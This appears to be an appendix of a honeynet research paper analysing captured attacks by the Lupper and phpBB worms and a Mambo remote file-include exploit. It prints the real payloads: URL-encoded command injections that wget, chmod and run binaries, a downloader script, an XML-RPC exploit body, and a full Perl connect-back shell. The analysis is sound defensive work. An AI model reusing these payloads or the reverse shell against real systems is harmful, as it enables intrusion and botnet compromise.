Appendix A - Examples

This section provides some examples from the wild.

The Lupper Worm

The following is an example Apache log entry of an attack by the Lupper worm, against the AWStats command-injection vulnerability:

[24/Dec/2005:13:02:18 +1300] GET
/cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20xx%2eyyy%2ez%2e216%2fnikons%3bchmod%20%2bx%20nikons%3b%2e%2fnikons;echo%20YYY;echo|
HTTP/1.1

(Please note that the IP addresses and domains have been obfuscated throughout this paper.)

Certain versions of the awstats program would execute the code "echo%20YYY;cd%20%2ftmp%3bwget%20192%2e168%2e1%2e216%2fnikons%3bchmod%20%2bx%20nikons%3b%2e%2fnikons;echo%20YYY;" in response to this request. This would cause the file at '192.168.1.216/nikons' to be downloaded and stored in the /tmp directory. Then it would be made executable using the 'chmod +x nikons' and finally it would be executed.

This file 'nikons' was a shell script which attempted to download two programs; an IRC bot, identified as Tsunami.A and a variant of the Lupper worm. The Lupper variant tried to spread via scanning for hosts listening on port 80 and attempting to exploit the AWStats and PHPXMLRPC vulnerabilities. (Another Lupper variant is described as trying to exploit a file called hints.pl - this behavior not present in our captured version.)

#!/bin/bash
cd /tmp
wget 192.168.48.69/d
chmod 744 d
./d
wget 192.168.48.69/qs
chmod 744 qs
./qs

The bash script 'nikons', which downloads and executes two files from a webserver.

The worm probed for the following scripts: /xmlrpc/xmlrpc.php, /wordpress/xmlrpc.php, /phpgroupware/xmlrpc.php, /drupal/xmlrpc.php,
/blogs/xmlsrv/xmlrpc.php, /blog/xmlsrv/xmlrpc.php, /blog/xmlrpc.php
If present, any of these scripts would have been exploited via the following PHPXMLRPC exploit. The following POST payload downloads the tool "gicuji", a shell script to download and execute the Lupper and Tsunami binaries.

POST /xmlsrv/xmlrpc.php HTTP/1.1 ...
Content-Type: text/xml
Content-Length:269

<?xml version='1.0'?><methodCall><methodName>test.method</methodName><params><param><value><name>',' '));echo '_begin_';echo\ `cd /tmp;wget xxx.yy.zz.144/gicuji;chmod +x gicuji;./gicuji `;echo '_end_';exit;/*</name></value></param></params>\</methodCall>

The PHPBB Worm

This section exhibits example logs created by a worm exploiting a remote code execution vulnerability within phpBB2. The exploit was sent in the value of the "highlight" parameter of the application's viewtopic.php script. Accessing the following URL downloaded the file root.txt from the domain example.com /phpBB2/viewtopic.php?p=1277&highlight=%2527.$poster=include($_GET[m]).%2527&m=http://example.com/root.txt?&

The worm checks if the PHPBB installation is vulnerable by fetching the following URL, by attempting to print "jSVowMsd" in the output. If it finds "jSVowMsd" in the requested page, that is, if the vulnerability is present in the application, the targeted PHP server will then run the next two commands.

/phpBB2/viewtopic.php?p=2024&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114) ... chr(34))%252E%2527

The following downloads software from example.com/chobits/linuxday.txt
/phpBB2/viewtopic.php?p=2024&highlight=%2527%252Esystem(chr(119)%252Echr(103) ... chr(56))%252E%2527

Finally, a bot is downloaded and executed in an attempt to join a botnet:
/phpBB2/viewtopic.php?p=2024&highlight=%2527%252Esystem(chr(119)%252Echr(103)%252Echr(101) ... chr(110)%252Echr(99)%252Echr(97))%252E%2527

Mambo exploit

This section describes an instance of the Mambo exploit observed on out honeynet. The hosts involved in the attack are:

  • 216.63.z.z is the initiator of the exploit
  • 10.0.x.x is the victim
  • 66.98.a.a is the server on which the defacing tool resides
  • 216.99.b.b is the host the first-stage payload resides on
  • 217.160.c.c is the host that we connect back to and
  • 219.96.d.d is the host on which the second-stage payload resides

The following activity was logged by Apache during the attack:

216.63.z.z - - [28/Feb/2006:12:30:44 +1300] GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&
_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.98.a.a/cmd.txt?&cmd=cd%20/tmp;wget%20216.99.b.b/cback;chmod%20744%20cback;
./cback%20217.160.c.c%208081;wget%20216.99.b.b/dc.txt...

The GET request is an attempt to exploit a Mambo remote file-include vulnerability to execute http://66.98.a.a/cmd.txt on the victim host. Despite the extension .txt, the URL specifies a PHP script rather than a text file. The vulnerable code in Mambo is as follows:

require_once( "$mosConfig_absolute_path/modules/mod_mainmenu.class.php" );

When the exploit above is used against a vulnerable Mambo installation, the code that is executed is:
require_once( "http://66.98.a.a/cmd.txt?modules/mod_mainmenu.class.php" );

This simply includes the file the attacker wants and ignores the filename after the '?' character. The included code then attempts to execute the operating system commands specified by the cmd= parameter in the original HTTP request. (Successful exploitation of this vulnerability requires the allow_url_fopen configuration directive to be on.) The Philippine Honeynet Project have analysed an incident in which this script 'cmd.txt' appears: "Defacing Tool 2.0 by r3v3ng4ns" is a suite of php based scripts that allows the attacker to send commands to the server primarily with the intent to
deface web sites.". In our experience the script is often used to download further malware using wget/curl, or to test for the presence of vulnerable scripts by attempting commands such as 'id' or 'uname'. It seems that the script can also be uploaded to PHP/Apache servers to provide an easily accessible set of utilities for executing commands, searching for files. This will only be an issue if the web server allows the upload of PHP scripts to the web root. The command that was parsed out is as follows:

cd /tmp; wget 216.99.b.b/cback; chmod 744 cback; ./cback
217.160.c.c 8081; wget 216.99.b.b/dc.txt; chmod 744 dc.txt; perl dc.txt
217.160.c.c 8081;cd /var/tmp; curl -o cback
http://216.99.b.b/cback;chmod 744 cback; ./cback 217.160.c.c 8081; curl
-o dc.txt http://216.99.b.b/dc.txt;chmod 744 dc.txt; perl dc.txt
217.160.c.c 8081;echo YYY;echo|

Five distinct hosts have participated in the attack up to the point that this command is executed

  • the victim
  • the host that exploited the vulnerability and initiated the download
  • the host that the malware is downloaded from
  • the host that will be connected to on port 8081
  • the host where the "Defacing Tool v2.0" resides

This script is dc.txt, a simple connect-back shell written in Perl:

 #!/usr/bin/perl
 use Socket;
 use FileHandle;
 $IP = $ARGV[0];
 $PORT = $ARGV[1];
 socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
 connect(SOCKET, sockaddr_in($PORT,inet_aton($IP)));
 SOCKET?autoflush();
 open(STDIN, ">&SOCKET");
 open(STDOUT,">&SOCKET");
 open(STDERR,">&SOCKET");
 system("id; pwd; uname -a; w; HISTFILE=/dev/null /bin/sh -i");

The behavior of this script was studied on a virtual machine. The script downloaded and executed another Perl program, the IRC bot variant PERL/Shellbot. This joined a particular IRC channel and waited for commands.